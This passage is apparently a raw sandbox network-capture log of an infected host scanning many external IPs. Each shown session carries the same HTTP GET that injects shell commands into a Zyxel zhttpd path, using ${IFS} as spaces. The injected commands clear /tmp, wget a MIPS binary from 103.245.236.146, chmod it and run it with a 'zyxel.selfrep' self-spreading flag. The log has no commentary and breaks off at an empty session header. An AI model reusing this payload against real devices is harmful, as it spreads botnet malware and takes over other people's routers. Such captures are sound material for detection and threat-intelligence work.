                                                Jan 28, 2024 10:16:42.061680079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8855192.168.2.2333014203.68.130.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061712980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8856192.168.2.235435435.187.44.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080553055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8857192.168.2.235550291.202.38.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080620050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8858192.168.2.235094876.103.207.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080651999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8859192.168.2.235169413.164.229.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080667973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8860192.168.2.2340788122.84.213.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080688000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8861192.168.2.2343952216.17.34.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080729961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8862192.168.2.2353142199.53.88.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080770016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8863192.168.2.2351356106.157.205.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080804110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8864192.168.2.2334276109.176.176.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080823898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8865192.168.2.234955432.206.183.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080847025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8866192.168.2.2336060115.8.228.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080871105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8867192.168.2.2338268209.250.192.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080920935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8868192.168.2.2358492104.156.12.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080960989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8869192.168.2.2348978101.208.4.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080965996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8870192.168.2.2340240139.202.241.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.080986977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8871192.168.2.2344128169.95.37.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081013918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8872192.168.2.2345408100.180.200.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081013918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8873192.168.2.235305064.199.220.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081037998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8874192.168.2.2340090201.134.105.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081068039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8875192.168.2.235231061.49.48.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081089973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8876192.168.2.234126074.55.164.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081114054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8877192.168.2.2339612116.189.79.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081129074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8878192.168.2.2353538193.177.46.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081156015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8879192.168.2.235841085.79.98.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081166983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8880192.168.2.233355069.192.130.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081190109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8881192.168.2.235145443.161.178.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081218958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8882192.168.2.2333056219.210.198.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081271887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8883192.168.2.2352456132.184.108.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081290007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8884192.168.2.2352508139.9.96.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081305027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8885192.168.2.234084272.245.163.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081350088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8886192.168.2.2342932163.163.4.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081355095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8887192.168.2.23452068.0.196.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081383944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8888192.168.2.2351154110.165.3.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081408024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8889192.168.2.23382744.132.205.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081424952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8890192.168.2.2354098162.244.63.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081437111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8891192.168.2.234389879.28.188.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081466913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8892192.168.2.235888083.72.145.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081518888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8893192.168.2.2345438194.53.161.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081551075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8894192.168.2.233960068.23.72.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081579924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8895192.168.2.2343384149.102.255.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081608057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8896192.168.2.235820279.25.121.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081629992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8897192.168.2.2337550158.236.131.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081633091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8898192.168.2.235492223.244.9.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081676006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8899192.168.2.234020412.132.10.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081712961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8900192.168.2.235331863.177.52.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081737995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8901192.168.2.2340474140.240.82.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081741095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8902192.168.2.235602647.215.226.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081772089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8903192.168.2.2342010101.243.100.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081820011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8904192.168.2.2360188210.167.114.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081857920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8905192.168.2.2343936133.76.59.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081866026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8906192.168.2.2340652178.255.108.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081906080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8907192.168.2.2359246140.148.121.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081924915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8908192.168.2.233344689.250.153.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081959009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8909192.168.2.2336116169.125.154.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081984997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8910192.168.2.2359468129.30.54.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.081984997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8911192.168.2.235875220.255.232.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082019091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8912192.168.2.2339264144.133.129.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082062960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8913192.168.2.2350344141.73.230.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082079887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8914192.168.2.234531871.230.184.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082110882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8915192.168.2.233849038.51.129.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082117081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8916192.168.2.2336614222.8.12.128443
                                                TimestampBytes transferredDirectionData
